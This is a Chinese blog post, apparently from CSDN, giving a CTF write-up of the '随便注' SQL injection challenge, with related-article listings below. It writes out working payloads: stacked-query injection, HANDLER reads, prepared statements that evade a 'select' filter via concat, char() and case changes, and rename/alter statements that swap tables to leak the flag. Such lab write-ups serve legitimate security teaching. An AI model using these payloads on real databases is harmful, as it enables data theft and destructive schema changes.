ctf (随便注)

最新推荐文章于 2024-04-09 15:26:49 发布
最新推荐文章于 2024-04-09 15:26:49 发布
阅读量897 收藏
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Glacier_Mount/article/details/125709730
版权

知识点

堆叠注入

handler语句

预编译处理

alter、rename语句

开始

先随便注入一个万能语句看看。1'or 1=1#

 有回应但没获取什么有效信息我们继续看一下回显数。1' order by 3#

发现回显数是2。我们再看一下回显位置。1' union select 1,2 #

我们发现select被过滤了,于是我们无法使用联合查询语句了。

这是后我们可以试试功能性更强的堆叠注入能否使用。

我们直接看表 1';show tables # 

我们对两个表分别查询。

注:

1在windows系统中当是数据库、表、字段名时,我们应用反单引号将数字括起来,而单引号和双引号用与字符串。在linux系统中我们对单引号和反单引号不做区分。

2一般以数字命名的数据库、表、字段是要用引号括起来的。   

1'; show columns from words #

1'; show columns from `1919810931114514` #

 

 

我们在1919810931114514表中发现了flag字段。

因为select被过滤我们得想新的办法来读取flag的内容。

法一 handler

这个方法最为直接。使用handler打开并读取。

1' ;handler  `1919810931114514` open; handler `1919810931114514` read first #

 

法二 预编译处理

应用堆叠语句+预编译处理我们可以对select进行处理。

处理方法1 使用concat()语句将分开的select再合并。

1'; 

set @sql=concat('s','elect','*from `1919810931114514`');

prepare a from @sql;

execute a;#

定义语句 预执行 执行

 

结果我们得到了这样的反馈。经过查找发现strstr()是区分大小写的于是我们改一下set和prepare的大小写试试。

1'; 

Set @sql=concat('s','elect','*from `1919810931114514`');

Prepare a from @sql;

execute a;#

 

成功。

处理方法2 我们可以用concat()连接并用char()将select对应的ASCII码的数字转化为select。

1'; 

Set @sql=concat(char(115,101,108,101,99,116),'*from `1919810931114514`');

Prepare a from @sql;

execute a;#

 

成功。

法三 万能注入语句与username和password相关。

由于我们最开始在使用万能注入语句时有反应并且我们在words表中发现了id字段。

那我们可知在使用万能注入语句时,应出的是id的内容。

如果我们将id的名字给了flag,将words的名字给了1919810931114514那么我们再使用万能注入语句后获得的不就是flag的内容了吗。

1';

rename table words to words1;

rename table `1919810931114514` to words;  

alter table words change flag id varchar(100) ;#

修改完后我们输入万能密码查看回显。 

成功。

Glacier_Mount
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf (seelog)
cs_xiaoqiang的博客
01-17 2006
这次要说的和上篇一样,也是一道i春秋下的ctf。给的题目如下图: 依旧是找flag,题目为seelog,直接访问连接  http://106.75.86.18:3333给出的提示是:不是内部网站。我第一时间想到的是会不会这个服务器上还有其他的网站,进过尝试发现方向不对。再仔细从头看,题目为seelog(看日志),解题思路应该与log有关。经过无数的尝试,发现在url后面加上log就可以访问到日志。
ctf
weixin_43375255的博客
04-01 1869
CTF吗? 只是自己前几天做的密码题和zip文件题,今天做一个总结。 一、Crypto 1.恺撒七世 题目描述: 说实话,凯撒特别喜欢自己的儿子,还准备把自己家金库密码偷偷告诉他: camatiabpmpmilntioqavwbpqvoabwxugabmx 恺撒密码在上一个博客已经解释过了,是通过一定数值的偏移进行加密的简单的加密方法 这道题的思路就是凯撒七世喜欢他的儿子,很明显,恺撒八世的“8”...
buuctf[强网杯 2019]随便 1(超详细,三种解法)
m0_73734159的博客
10-26 1950
网页环境判断是否是字符型入1'判断是否存在关键字过滤select联合查询被过滤,只能用堆叠入了查看有几个字段正常回显回显报错,可以看出只有两个字段查看所有数据库查看所有数据表爆words数据表的字段爆1919810931114514数据表字段(意数据表为数字的时候需要用反引号括起来);可以看到这两个表words表有两个字段,而另一个只有一个字段。
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
buuctf web题解之[强网杯 2024]随便1详解,2024年最新独家发布
最新发布
2401_84160087的博客
04-09 773
当我们输入id=1‘的时候,只要他页面有变化,那就是这里可能存在入点但是这里具体是要填id=1‘,还是id=1“,或者是id=1’),那就涉及到闭合方式的判断了。就如上边所说,闭合方式有很多种,我们需要挨个猜常见的闭合方式有成对的’ ‘、” “、( )、(’ ')判断具体是哪种,只能挨个试…直到输入 1’ 页面发生了报错,说明是 ’ 闭合(单引号的闭合)自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技
mysql常用语句总结
weixin_44540005的博客
01-18 178
二次整理 先看下对应编译字段意思: limit:大意为限制、order by 通过排序(默认顺序排序)、ase正序、dese倒叙 inner join 内部连接 、left join 左连接 、right join 右连接、 简单的增删查改 (下面的‘?’是对应类型的值) 查询:select * from 表名 ; //*:全部、可写列名、或嵌套语句(这个下面会说到) 新增:ins...
BUUCTF随便
金 帛的博客
04-03 5425
BUUCTF的WP
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 2415
以buuctf的强网杯2019为例的堆叠
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
CTF神器_ctf
09-23
【标题】:“CTF神器_ctf” 在网络安全领域,CTF(Capture The Flag)是一种流行的竞赛形式,参与者通过解决各种安全挑战来展示他们的技能。在这个压缩包“CTF神器_ctf”中,重点可能指向了一个名为“dirsearch”的...
CTF题库超详细资源合集
06-14
ctf题库 CTF 题⽬类型⼀般分为 Web 渗透、RE 逆向、Misc 杂项、PWN ⼆进制漏洞利⽤、Crypto 密码破译。 在传统的CTF线上⽐赛中,Web类题...Web类题⽬常见的漏洞类型包括⼊、XSS、⽂件包含、代码执⾏、上传、SSRF等。
ctf拼图例题-puzzle
04-13
CTF(Capture The Flag)竞赛中,"puzzle"是一种常见的挑战类型,它涉及到解决各种谜题以获取关键信息或解密数据。本资源包包含了一组与CTF拼图相关的图片,很可能是参赛者需要解读的线索。每个图片可能代表一个...
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
BUUCTF随便
m0_54993799的博客
12-22 429
输入 1' and updatexml(1, (concat(0x7e,(select database()),0x7e)),1)利用数据库的表的特性,将原来的words表改名为words123,将1919那张表改名为 words;如果直接查值,那就需要 select,但是select已经被限制了。除了查询id=1的值,还把数据库的名字都查出来了。发现一些关键字被限制了,但分号没有被限制,输入 1'"# ,页面返回报错信息。输入 1'# ,得到如下页面。再提交 ' or 1=1 #
sql入的学习
m0_64815693的博客
11-08 1803
sql入绕过和入基础
【BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 3959
这是一个典型的sql入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
MySql5.7使用存储过程 批量插入数据(1条SQL语句)
lizhou828的专栏
07-03 2405
Mysql5.7 使用存储过程 分段生成 亿级 测试数据_lizhou828的博客-CSDN博客s1、建表DROP TABLE IF EXISTS `t_big_table`;CREATE TABLE `t_big_table` ( `id` bigint(20) NOT NULL, `code` varchar(255) DEFAULT NULL, `username` varchar(255) DEFAULT NULL, `password` varcha...https://blog.csdn.net
mysql 触发器拼接字符串,MYSQL 批量生成触发器
weixin_39927214的博客
03-17 403
MYSQL 批量生成触发器祖仙教小凡仙 海鲨数据库架构师上周实现银行一个需求,需求是这样的,有些项目的核心表只能通过JAVA程序进行修改,不允许其他程序修改。这个需求基于ORACLE的在去年也实现了。大概是通过创建两个表,其中一个用来保存需要保护的核心表的名字,另外个叫黑名单的表保存禁止机器名。然后写个过程 根据两个表生产触发器,有多少核心表,就生成多少个触发器。上周基于ORACLE设计想法,在...
BUUCTF-随便、Exec、EasySQL、Secret File
m0_62905261的博客
06-13 773
目录[强网杯 2019]随便[ACTF2020 新生赛]Exec[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File打开场景,里面有输入框,上面自带一个1,点击提交,有回显输入1 ' or '1'='1 有回显,因该是字符型猜测是sql入,查询字段数,输入1' order by 1 #当查询到第三个字段的时候,回显异常,说明只有两个字段输入1' union select 1,2 # 回显一个正则过滤规则过滤了很多的东西 查询数据库,输入1'; show databa
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值